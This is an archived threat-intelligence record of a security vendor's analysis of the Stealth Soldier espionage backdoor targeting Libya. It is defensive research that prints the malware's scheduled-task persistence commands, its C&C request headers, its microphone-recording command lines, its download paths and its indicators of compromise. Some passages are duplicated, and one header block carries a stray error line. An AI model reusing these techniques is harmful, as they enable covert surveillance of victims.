{
	"id": "e89e62dc-a9c1-4c42-9717-8f72758dccc6",
	"created_at": "2026-04-06T00:07:27.976426Z",
	"updated_at": "2026-04-10T03:30:57.025804Z",
	"deleted_at": null,
	"sha1_hash": "69c2125fa05f705cfefa501dbfb90af83f7d137c",
	"title": "Stealth Soldier Backdoor Used in Targeted Espionage Attacks in North Africa",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 123977,
	"plain_text": "Stealth Soldier Backdoor Used in Targeted Espionage Attacks in\r\nNorth Africa\r\nBy etal\r\nPublished: 2023-06-08 · Archived: 2026-04-05 21:32:36 UTC\r\nKey findings\r\nCheck Point Research observed a wave of highly-targeted espionage attacks in Libya that utilize a new\r\ncustom modular backdoor.\r\nStealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such\r\nas file exfiltration, screen and microphone recording, keystroke logging and stealing browser information.\r\nThe Stealth Soldier infrastructure has some overlaps with infrastructure the The Eye on the Nile which\r\noperated against Egyptian civilian society in 2019. This is the first possible re-appearance of this threat\r\nactor since then.\r\nThe newest version of the backdoor we found was Version 9, likely delivered in February 2023. The oldest\r\nversion we found was Version 6, compiled in October 2022.\r\nThere are indications that the malware C\u0026C servers are related to a larger set of domains, likely used for\r\nphishing campaigns. Some of the domains masquerade as sites belonging to the Libyan Foreign Affairs\r\nMinistry.\r\nIntroduction\r\nCheck Point Research identified an ongoing operation against targets in North Africa involving a previously\r\nundisclosed multi-stage backdoor called Stealth Soldier. The malware Command and Control (C\u0026C) network is\r\npart of a larger set of infrastructure, used at least in part for spear-phishing campaigns against government entities.\r\nBased on what we observed in the phishing website themes and VirusTotal submissions, the campaign appears to\r\ntarget Libyan organizations.\r\nIn this article, we discuss the different techniques and tools used in this operation and its infrastructure. We also\r\nprovide technical analysis of the different Stealth Soldier versions. In addition, we discuss the similarities between\r\nthis operation and “Eye on the Nile”, another campaign targeting the region that was linked\r\nby Amnesty and Check Point Research to government-backed bodies.\r\nStealth Soldier\r\nOur investigation began when we came across multiple files submitted to VirusTotal from Libya between the\r\nmonths of November 2022 to January 2023. The file names were in Arabic:  وعاجل هام.exe (Important and\r\nUrgent.exe)  and  401 برقية.exe (Telegram 401.exe) , while the latest uses this name in regards to the Telegraph,\r\nand not the Telegram application. Analysis of the files reveals that all of them are downloaders for different\r\nversions of the same malware, internally named Stealth Soldier.\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 1 of 13\n\nStealth Soldier is a custom implant, likely used in a limited set of targeted attacks. The implant enables\r\nsurveillance operations and supports functionality such as keystroke logging and screenshot and microphone\r\nrecordings. The different versions found suggest that Stealth Soldier is actively maintained as of January 2023, the\r\ncompilation timestamp of its latest version.\r\nExecution Flow\r\nThe execution flow for all Stealth Soldier versions begins with the execution of the downloader, which triggers the\r\ninfection chain. Although the delivery mechanism of the downloader is currently unknown, the names suggest\r\nthey were delivered using social engineering. The malware infection chain is complex and contains several files,\r\nall of which are downloaded from the C\u0026C server. During the infection process, the malware downloads a total of\r\n6 (!) files from the C\u0026C servers. The main ones are:\r\nLoader ( MSDataV5.16945.exe ) – Downloads PowerPlus, an internal module to run PowerShell\r\ncommands, and uses it to create persistence for the watchdog. Runs Stealth Soldier’s final payload.\r\nWatchdog ( MSCheck.exe ) – Periodically checks for an updated version of the Loader and runs it.\r\nPersistent using Schedule Task and the Registry Run key.\r\nPayload ( MShc\u003cVersion\u003e.txt ) – Collects data, receives commands from the C\u0026C server, and executes\r\nmodules.\r\nThe workflow below details the full execution scheme of Stealth Soldier Version 9.\r\nFigure 1 - Infection flow for Stealth Soldier (Version 9).\r\nFigure 1 – Infection flow for Stealth Soldier (Version 9).\r\n1. The downloader downloads and opens a decoy empty PDF file. It then downloads the loader\r\nfrom  filecloud[.]store/sensaxcv/msupdate_enc.txt  and decrypts it with XOR keys\r\ninto  %APPDATA%/MSDataV5.16945.exe .\r\n2. The loader ( MSDataV5.16945.exe ) downloads an additional module named  pwls.dll , internally called\r\nPowerPlus. This module is written in .NET and executes PowerShell code. In addition, it checks for the\r\npresence of  TempDataDr\\MSCheck.exe , and if this file doesn’t exist, the loader downloads and executes it.\r\nIt later uses PowerPlus to run 2 commands, one of them for persistence and the other for querying details\r\nabout the task into a file named DRSch.\r\nschtasks /Query /TN MSChk \u003eC:\\Users\\Public\\DRSch\r\nschtasks.exe /create /sc minute /tn MSChk /tr ‘\\TempDataDr\\MSCheck.exe' /mo 15 /F\r\nFigure 2 - PowerPlus main logic.\r\nFigure 2 – PowerPlus main logic.\r\n3. The watchdog ( MSCheck.exe ) checks if  MSDataV5.16945.exe  exists in a directory\r\nnamed  TempDataLa.  If it doesn’t, then the watchdog downloads the file from the C\u0026C (from\r\nURI  /msupdate_enc_new.txt  ) and decrypts it, likely as an update mechanism. It then runs the Loader.\r\n4. The Loader checks the version of Stealth Soldier, stored in the file  MV.txt , which it downloads from the\r\nC\u0026C. Depending on the versions embedded within the  txt  file, it adds the number to the name of the\r\nfinal payload in the format  MShc\u003cVersion\u003e.txt .\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 2 of 13\n\n5. Finally, the malware decrypts the payload before running it as a shellcode from the MZ header with\r\nthe  CreateThread  API. The shellcode loads the payload and passes the execution to its main logic.\r\nThe flow is similar for all versions of the malware, with the main difference being the payload and the C\u0026C\r\nserver. Version 6 communicates with  filestoragehub[.]live , Version 8 communicates\r\nwith  customjvupdate[.]live  and Version 9 communicates to  filecloud[.]store .\r\nTechnical Analysis\r\nPayload\r\nThe payload starts by collecting information from the victim:\r\nHostname and Username, used to create the Identifier Name (hostname + username)\r\nDrive List (or as the attackers call it, “DriverList”) includes:\r\nDrive Name\r\nFree Disk Space\r\nDrive Type (Removable, Fixed, CDRom or Unknown)\r\nAll files inside the path  \"C:\\\\Users\\\\Public\\\\KLData\\\\”  – All files from the keylogger module.\r\nThe information is sent in different packets and XORed with the key string  “Windows Cmd”  to the\r\nIP  94.156.33.228 .\r\nThe post request has the following headers:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nPOST /Server/Request HTTP/1.1\r\nHost: webadmin.com\r\nIndexError: list index out of range\r\nUser-Agent: Mozilla/5.0 XXXABCXXX **Stealth Soldier**\r\nContent-Type: text/xml; charset=utf-16-le\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 3 of 13\n\nConnection: keep-alive\r\nCustom-Ending: XXXEnDOfHeader\r\nPOST /Server/Request HTTP/1.1 Host: webadmin.com IndexError: list index out of range User-Agent:\r\nMozilla/5.0 XXXABCXXX **Stealth Soldier** Content-Type: text/xml; charset=utf-16-le Accept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Custom-Ending: XXXEnDOfHeader\r\nPOST /Server/Request HTTP/1.1\r\nHost: webadmin.com\r\nIndexError: list index out of range\r\nUser-Agent: Mozilla/5.0 XXXABCXXX **Stealth Soldier**\r\nContent-Type: text/xml; charset=utf-16-le\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nConnection: keep-alive\r\nCustom-Ending: XXXEnDOfHeader\r\nThe malware sends the string  Request for new tasks  to the C\u0026C, which responds with the commands.\r\nCommand list\r\nThe malware uses different types of commands: some are plugins that are downloaded from the C\u0026C and some\r\nare modules inside the malware. For example,  MicRecord  runs in the context of the malware itself and not as an\r\nexternal plugin. The recording is performed using the  mciSendStringA  API and the following command lines:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nopen new type waveaudio alias Record1\r\nset Record1 time format ms\r\nset Record1 bitspersample 16\r\nset Record1 samplespersec 16000\r\nset Record1 bytespersec 8000\r\nset Record1 channels 2\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 4 of 13\n\nrecord Record1 notify\r\nstop Record1\r\nsave Record1 \"C:\\\\Users\\\\Public\\\\1.wav\"\r\nclose Record1\r\nopen new type waveaudio alias Record1 set Record1 time format ms set Record1 bitspersample 16 set Record1\r\nsamplespersec 16000 set Record1 bytespersec 8000 set Record1 channels 2 record Record1 notify stop Record1\r\nsave Record1 \"C:\\\\Users\\\\Public\\\\1.wav\" close Record1\r\nopen new type waveaudio alias Record1\r\nset Record1 time format ms\r\nset Record1 bitspersample 16\r\nset Record1 samplespersec 16000\r\nset Record1 bytespersec 8000\r\nset Record1 channels 2\r\nrecord Record1 notify\r\nstop Record1\r\nsave Record1 \"C:\\\\Users\\\\Public\\\\1.wav\"\r\nclose Record1\r\nBelow is the full list of supported Stealth Soldier commands:\r\nCommand Arguments Description Implant possible error\r\nImplant\r\npossible\r\nerror\r\nDirectoryList\r\nDirectory\r\nname\r\nSends all directory\r\ncontent\r\n“Directory List of is:” +\r\nfilenames\r\n“Error\r\noccured in\r\ngetting Folder\r\nContents” +\r\n“Managed to\r\nCount %d\r\nFiles Before\r\nError”\r\nUploadFile filename\r\nUploads the file to\r\nthe C\u0026C\r\nFile content + “File\r\nUploaded Successfully “\r\n“File Failed\r\nto be\r\nuploaded”\r\nScreenshot – Runs sc.exe and\r\nsends to C\u0026C\r\n“ScreenShot Taken\r\nSuccessfully” + “Image to\r\nbe uploaded = 1.png” +\r\n“Error\r\nOccured in\r\nCreating\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 5 of 13\n\nCommand Arguments Description Implant possible error\r\nImplant\r\npossible\r\nerror\r\n“ScreenShot Taken \u0026\r\nUploaded Successfully”\r\nScreenShot\r\nProcess”\r\nMicRecord sleep time\r\nRecords the victim’s\r\ncomputer and sends it\r\nto C\u0026C\r\n“C:\\Users\\Public\\1.wav” +\r\ncontent + “Recording\r\nSaved \u0026 Uploaded\r\nSuccessfully”\r\n“Failed to\r\nUpload\r\nRecording\r\nFile”\r\nKeylogger –\r\nRuns plugin kl.exe\r\n(downloads it from\r\nC\u0026C)\r\n“KeyLogger Task Started\r\nSuccessfully”\r\n“Error\r\nOccured in\r\nCreating\r\nKeyLogger\r\nProcess”\r\nBrowserCreds –\r\nRuns BrCr.exe\r\nmodule (downloads it\r\nfrom C\u0026C)\r\n“BrowserCreds Task\r\nStarted Successfully”\r\n“Error\r\nOccured in\r\nCreating\r\nBrowserCreds\r\nProcess”\r\nCmdExec command\r\nRuns PowerShell\r\ncommand with\r\nPowerPlus module\r\n(pwls.dll). The result\r\nof the command will\r\nbe in\r\nC:\\Users\\Public\\Exec.\r\n“CommandExecutionResult\r\nfor Command: …is:“\r\n+”Command : : Executed\r\nand Result Sent\r\nSuccessfully”\r\n“Command : :\r\nExecuted but\r\nFailed to\r\nUpload\r\nResult” or\r\n“Command : :\r\nFailed to be\r\nExecuted“\r\nPlugins\r\nThe payload runs several plugins: first it downloads them, then writes to their respective filenames, and finally\r\nexecutes. At the time of our analysis, some of the modules were no longer available for download.\r\nScreen Capture\r\nThe screen capture plugin is called  sc.exe  and is downloaded from the C\u0026C server. It is a compiled .NET open-source project named https://github.com/bencevans/screenshot-desktop. The module supports the following\r\narguments (can be seen using the flag /h or /help)\r\nPlain text\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 6 of 13\n\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n\u003cfilename\u003e captures the screen or the active window and saves it to a file.\r\nUsage: filename [WindowTitle]\r\nfilename - the file where the screen capture will be saved\r\nallowed file extensions are - Bmp,Emf,Exif,Gif,Icon,Jpeg,Png,Tiff,Wmf.\r\nWindowTitle - instead of capture whole screen you can point to a window\r\nwith a title which will put on focus and captuted.\r\nFor WindowTitle you can pass only the first few characters.\r\nIf don't want to change the current active window pass only\r\n\u003cfilename\u003e captures the screen or the active window and saves it to a file. Usage: filename [WindowTitle]\r\nfilename - the file where the screen capture will be saved allowed file extensions are -\r\nBmp,Emf,Exif,Gif,Icon,Jpeg,Png,Tiff,Wmf. WindowTitle - instead of capture whole screen you can point to a\r\nwindow with a title which will put on focus and captuted. For WindowTitle you can pass only the first few\r\ncharacters. If don't want to change the current active window pass only\r\n\u003cfilename\u003e captures the screen or the active window and saves it to a file.\r\nUsage: filename [WindowTitle]\r\nfilename - the file where the screen capture will be saved\r\n allowed file extensions are - Bmp,Emf,Exif,Gif,Icon,Jpeg,Png,Tiff,Wmf.\r\nWindowTitle - instead of capture whole screen you can point to a window\r\n with a title which will put on focus and captuted.\r\n For WindowTitle you can pass only the first few characters.\r\n If don't want to change the current active window pass only\r\nThe default name for the screenshot is  screenshot.bmp  for full-screen screenshots. The module also supports\r\nscreenshots of a specific window.\r\nBrowser Credentials\r\nThis plugin is called  BrCr.txt . It starts with another loader that downloads the next stage from the\r\nURI  /BRCRLa_enc.txt , decrypts and writes it to  C:\\Users\\Public\\BRCRLa.exe , and then executes it. It is\r\nfollowed by another layer of downloads that retrieve the final payload from  /BRCRShc.txt . The module runs in\r\nmemory after it is decrypted: the loader runs it from the first byte which is part of the MZ header. This header\r\ncalls to a shellcode that resides at the end of the file. The shellcode loads the file itself and then runs from the\r\nentry point.\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 7 of 13\n\nThe real plugin is the open-source project https://github.com/moonD4rk/HackBrowserData, which is an open-source utility to decrypt browser data from the most popular browsers.\r\nEncryption\r\nThe malware’s different stages use the same kind of encryption for their strings, communication and payloads.\r\nMost of the time the encryption is XORed with 2 hardcoded strings (even though in the payload the strings are\r\nXORed with only one hardcoded string). The strings used as XOR keys masquerade as legitimate strings which\r\nmakes it harder to spot the malware.\r\nThe different XOR keys we encountered are:\r\n\"Windows CRT”\r\n\"Microsoft Windows”\r\n\"WINDOWS NT”\r\n\"Windows NT”\r\n\"Command Prompt”\r\n\"system32”\r\n\"Windows 10\"\r\nFigure 3 - Encryption keys and the encryption domain string.\r\nFigure 3 – Encryption keys and the encryption domain string.\r\nVersions\r\nWe observed 3 infection chains of Stealth Soldier malware with different versions depending on the payload – 6, 8\r\nand 9. The flows were pretty similar, and had the same logic. The differences between the versions indicate active\r\ndeployment and possible rearrangement of plugins. For example, the payloads in earlier versions (before Version\r\n9) didn’t contain the BrowserCreds module.\r\nAdditional differences include the filenames, mutex names, XOR keys and directory names. There is also a\r\ndifference in the values set to the  SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run  for persistence:\r\n\"Cache”  – Version 6\r\n\"WinUpdate”  – Version 8\r\n\"DevUpdate”  – Version 9\r\nThe watchdog also changed between the versions. In Version 6 it only checks if the second stage ( MSCheck.exe )\r\nexists and if it doesn’t, downloads a new one with the same name.\r\nIn Version 8, the  MSCheck.exe  watchdog checks if the second-stage loader  MSUpdate.exe  exists in the\r\ndirectory  MSTemp.  If it doesn’t, the watchdog tries to read and decrypt from  MSUVersion.txt  an address from\r\nwhich to download an updated version. This is different from Version 9 where the update mechanism tries directly\r\nto download the whole file. In Version 9’s C\u0026C server  [filecloud.store](http://filecloud.store),  we found\r\nan  MSUVersion.txt  file that leads to  https://msheartbeat[.]live/sensaxcv/MSUpdate2.txt  address, which\r\ncan show traces of using this C\u0026C in the past.\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 8 of 13\n\nPhishing domains\r\nHistoric PDNS resolutions reveal the C\u0026C\r\ndomains  customjvupdate[.]live  and  filestoragehub[.]live  resolved in the past to IP addresses in the same\r\nASN on the IP range  185.125.230.0/24 . Actively hunting for malicious activity within this ASN, we were able\r\nto retrieve a limited set of domains that were likely used to impersonate the Libyan Ministry of Foreign Affairs in\r\na phishing attempt. Among those domains were :\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nforeign.gov.ly.webmailogemail.com\r\nmofa.gov.ly.loginlive.loglivemail.com\r\nms.mf.ly.loglivemail.com\r\nms.lybia.loglivemail.com\r\nly.loginlive.loglivemail\r\nforeign.gov.ly.2096.website\r\nforeign.gov.ly.webmailogemail.com mofa.gov.ly.loginlive.loglivemail.com ms.mf.ly.loglivemail.com\r\nms.lybia.loglivemail.com ly.loginlive.loglivemail foreign.gov.ly.2096.website\r\nforeign.gov.ly.webmailogemail.com\r\nmofa.gov.ly.loginlive.loglivemail.com\r\nms.mf.ly.loglivemail.com\r\nms.lybia.loglivemail.com\r\nly.loginlive.loglivemail\r\nforeign.gov.ly.2096.website\r\nThe newly-found phishing domains were hosted on IPs containing additional phishing domains with similar\r\nregistration patterns. Pivoting off those patterns and using hosting history and similar naming conventions, mostly\r\ncombinations of the keywords  mail / notify / verify / web / log / live , we were able to identify more than\r\n50 domains with similar characteristics.\r\nFigure 4 - Phishing Infrastructure.\r\nFigure 4 – Phishing Infrastructure.\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 9 of 13\n\nMost of the domains were unresponsive during our analysis. Many of them have subdomains with name patterns\r\nsuch as “ mail.yahoo ”, “ livemail ”, “ telegram.org ” and “ login.outlook ”, which strongly suggests that\r\nthey were intended to be used in a phishing campaign.\r\nAttribution\r\nDuring our analysis, we found some overlaps in the infrastructure used in this operation with another\r\ncampaign, Eye-On-The-Nile, which is aimed at targets in the North Africa region\r\nThe Version 8 C\u0026C  customejvupdate[.]live  resolved by the IP  185.125.230.116  was also resolved by\r\nmultiple Eye on the Nile domains:  weblogin.live , mailsecure.live , verifymail.live . In addition, the\r\nnaming convention used in the phishing domains cluster:  mail / notify / verify / web / log / live  is the\r\nsame one used in the Eye on the Nile campaign.\r\nEye on the Nile\r\nThe 2019 report by Amnesty International describes how Egyptian civilian organizations and individuals were\r\ntargeted with sophisticated phishing attacks using third-party applications, such as Google and Yahoo, to steal\r\nsensitive information and monitor their activities. In a follow-up report Eye on the Nile, we uncovered the\r\nbackground of this operation, tracked its origin, and connected it to a surveillance-focused Android backdoor.\r\nThroughout the analysis of Stealth Soldier campaigns, we were able to identify several infrastructure overlaps\r\nwith known Eye on the Nile domains. This adds up to the narrow regional targeting and similar phishing domain\r\nnaming patterns.\r\nFigure 5 - Eye on the Nile Infrastructure as previously reported by CheckPoint Research.\r\nFigure 5 – Eye on the Nile Infrastructure as previously reported by CheckPoint Research.\r\nConclusion\r\nThis report describes a previously undocumented malware campaign targeting Libya, a country that is not often\r\nthe focus of APT reports. The investigation suggests that the attackers behind this campaign are politically\r\nmotivated and are utilizing the Stealth Soldier malware and a significant network of phishing domains to conduct\r\nsurveillance and espionage operations against Libyan and Egyptian targets.\r\nGiven the modularity of the malware and the use of multiple stages of infection, it is likely that the attackers will\r\ncontinue to evolve their tactics and techniques and deploy new versions of this malware in the near future.\r\nFinally, our analysis revealed a connection to the previously exposed “Eye on the Nile” campaign. This\r\nconnection raises the possibility that the current operation may have additional undetected components, such as a\r\nmobile backdoor that was used in the earlier campaign but was not observed since.\r\nCheck Point Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating\r\nsystems, and has developed and deployed a signature named Trojan.Wins.StealthSoldier.ta to protect against\r\nthe threat described in this research\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 10 of 13\n\nProtections\r\nCheck Point Threat Emulation:\r\nTrojan.Wins.StealthSoldier.ta.A\r\nTrojan.Wins.StealthSoldier.ta.B\r\nTrojan.Wins.StealthSoldier.ta.C\r\nTrojan.Wins.StealthSoldier.ta.D\r\nCheck Point Anti-Bot:\r\nBackdoor.WIN32.StealthSoldier.A\r\nBackdoor.WIN32.StealthSoldier.B\r\nIOCs:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nDomains:\r\nfilestoragehub[.]live\r\ncustomjvupdate[.]live\r\nfilecloud[.]store\r\nwebmailogemail[.]com\r\nloglivemail[.]com\r\n2096[.]website\r\nIPs:\r\n185.125.230.216\r\n185.125.230.116\r\n94.156.33.228\r\n94.156.33.229\r\n185.125.230.224\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 11 of 13\n\n185.125.230.220\r\nHashes:\r\n2cad816abfe4d816cf5ecd81fb23773b6cfa1e85b466d5e5a48112862ceb3efb\r\n05db5e180281338a95e43a211f9791bd53235fca1d07c00eda0be7fdc3f6a9bc\r\nb9e9b93e99d1a8fe172d70419181a74376af8188dcb03249037d4daea27f110e\r\nd57fc4e8c14da6404bdcb4e0e6ac79104386ffbd469351c2a720a53a52a677db\r\ne7794facf887a20e08ed9855ac963573549809d373dfe4a287d1dae03bffc59f\r\n8c09a804f408f7f9edd021d078260a47cf513c3ce339c75ebf42be6e9af24946\r\ndf6a44551c7117bc2bed2158829f2d0472358503e15d58d21b0b43c4c65ff0b4\r\ne546d48065ff8d7e9fef1d184f48c1fd5e90eb0333c165f217b0fb574416354f\r\na43ababe103fdce14c8aa75a00663643bf5658b7199a30a8c5236b0c31f08974\r\nc0b75fd1118dbb86492a3fc845b0739d900fbbd8e6c979b903267d422878dbc6\r\ncb90a9e5d8b8eb2f81ecdbc6e11fba27a3dde0d5ac3d711b43a3370e24b8c90a\r\nd6655e106c5d85ffdce0404b764d81b51de54447b3bb6352c5a0038d2ce19885\r\nb94257b4c1fac163184b2d6047b3d997100dadf98841800ec9219ba75bfd5723\r\n7bfe2a03393184d9239c90d018ca2fdccc1d4636dfb399b3a71ea6d5682c92bd\r\nDomains: filestoragehub[.]live customjvupdate[.]live filecloud[.]store webmailogemail[.]com loglivemail[.]com\r\n2096[.]website IPs: 185.125.230.216 185.125.230.116 94.156.33.228 94.156.33.229 185.125.230.224\r\n185.125.230.220 Hashes: 2cad816abfe4d816cf5ecd81fb23773b6cfa1e85b466d5e5a48112862ceb3efb\r\n05db5e180281338a95e43a211f9791bd53235fca1d07c00eda0be7fdc3f6a9bc\r\nb9e9b93e99d1a8fe172d70419181a74376af8188dcb03249037d4daea27f110e\r\nd57fc4e8c14da6404bdcb4e0e6ac79104386ffbd469351c2a720a53a52a677db\r\ne7794facf887a20e08ed9855ac963573549809d373dfe4a287d1dae03bffc59f\r\n8c09a804f408f7f9edd021d078260a47cf513c3ce339c75ebf42be6e9af24946\r\ndf6a44551c7117bc2bed2158829f2d0472358503e15d58d21b0b43c4c65ff0b4\r\ne546d48065ff8d7e9fef1d184f48c1fd5e90eb0333c165f217b0fb574416354f\r\na43ababe103fdce14c8aa75a00663643bf5658b7199a30a8c5236b0c31f08974\r\nc0b75fd1118dbb86492a3fc845b0739d900fbbd8e6c979b903267d422878dbc6\r\ncb90a9e5d8b8eb2f81ecdbc6e11fba27a3dde0d5ac3d711b43a3370e24b8c90a\r\nd6655e106c5d85ffdce0404b764d81b51de54447b3bb6352c5a0038d2ce19885\r\nb94257b4c1fac163184b2d6047b3d997100dadf98841800ec9219ba75bfd5723\r\n7bfe2a03393184d9239c90d018ca2fdccc1d4636dfb399b3a71ea6d5682c92bd\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 12 of 13\n\nDomains:\r\nfilestoragehub[.]live\r\ncustomjvupdate[.]live\r\nfilecloud[.]store\r\nwebmailogemail[.]com\r\nloglivemail[.]com\r\n2096[.]website\r\nIPs:\r\n185.125.230.216\r\n185.125.230.116\r\n94.156.33.228\r\n94.156.33.229\r\n185.125.230.224\r\n185.125.230.220\r\nHashes:\r\n2cad816abfe4d816cf5ecd81fb23773b6cfa1e85b466d5e5a48112862ceb3efb\r\n05db5e180281338a95e43a211f9791bd53235fca1d07c00eda0be7fdc3f6a9bc\r\nb9e9b93e99d1a8fe172d70419181a74376af8188dcb03249037d4daea27f110e\r\nd57fc4e8c14da6404bdcb4e0e6ac79104386ffbd469351c2a720a53a52a677db\r\ne7794facf887a20e08ed9855ac963573549809d373dfe4a287d1dae03bffc59f\r\n8c09a804f408f7f9edd021d078260a47cf513c3ce339c75ebf42be6e9af24946\r\ndf6a44551c7117bc2bed2158829f2d0472358503e15d58d21b0b43c4c65ff0b4\r\ne546d48065ff8d7e9fef1d184f48c1fd5e90eb0333c165f217b0fb574416354f\r\na43ababe103fdce14c8aa75a00663643bf5658b7199a30a8c5236b0c31f08974\r\nc0b75fd1118dbb86492a3fc845b0739d900fbbd8e6c979b903267d422878dbc6\r\ncb90a9e5d8b8eb2f81ecdbc6e11fba27a3dde0d5ac3d711b43a3370e24b8c90a\r\nd6655e106c5d85ffdce0404b764d81b51de54447b3bb6352c5a0038d2ce19885\r\nb94257b4c1fac163184b2d6047b3d997100dadf98841800ec9219ba75bfd5723\r\n7bfe2a03393184d9239c90d018ca2fdccc1d4636dfb399b3a71ea6d5682c92bd\r\nSource: https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/"
	],
	"report_names": [
		"stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434047,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/69c2125fa05f705cfefa501dbfb90af83f7d137c.pdf",
		"text": "https://archive.orkl.eu/69c2125fa05f705cfefa501dbfb90af83f7d137c.txt",
		"img": "https://archive.orkl.eu/69c2125fa05f705cfefa501dbfb90af83f7d137c.jpg"
	}
}